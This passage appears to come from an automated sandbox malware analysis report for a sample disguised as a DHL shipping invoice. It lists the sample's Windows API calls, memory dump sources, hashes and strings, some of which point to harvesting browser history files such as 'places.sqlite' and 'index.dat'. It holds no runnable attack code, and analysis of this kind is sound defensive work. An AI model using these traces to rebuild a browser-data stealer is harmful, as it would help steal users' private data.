                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1355100292-0
                                                                                                                                                                                                                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                                      • API String ID: 2641622041-467022611
                                                                                                                                                                                                                                      • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                                                                                                                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 839530781-0
                                                                                                                                                                                                                                      • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                                                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID: *.*$index.dat
                                                                                                                                                                                                                                      • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                      • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                                                                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3397143404-0
                                                                                                                                                                                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1125800050-0
                                                                                                                                                                                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleSleep
                                                                                                                                                                                                                                      • String ID: }A
                                                                                                                                                                                                                                      • API String ID: 252777609-2138825249
                                                                                                                                                                                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3056473165-0
                                                                                                                                                                                                                                      • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • failed memory resize %u to %u bytes, xrefs: 00415358
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: realloc
                                                                                                                                                                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                                      • API String ID: 471065373-2134078882
                                                                                                                                                                                                                                      • Opcode ID: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                                                                                                                                                                                                                      • Instruction ID: fa0be88ae63bf8e7a0ec1cbb838f3bc130d20eb0a75070b99cf9e4f37552e13a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6EF05CB3A01705E7D2109A55DC418CBF3DCDFC0755B06082FF998D3201E168E88083B6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                                                                                                      • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: BINARY
                                                                                                                                                                                                                                      • API String ID: 2221118986-907554435
                                                                                                                                                                                                                                      • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                                                                                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                                      • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                                      • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                      • String ID: .|u
                                                                                                                                                                                                                                      • API String ID: 2081463915-3127499221
                                                                                                                                                                                                                                      • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2445788494-0
                                                                                                                                                                                                                                      • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                                                                                                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                      • Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                                                                                      • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                                                                                                                                      APIs
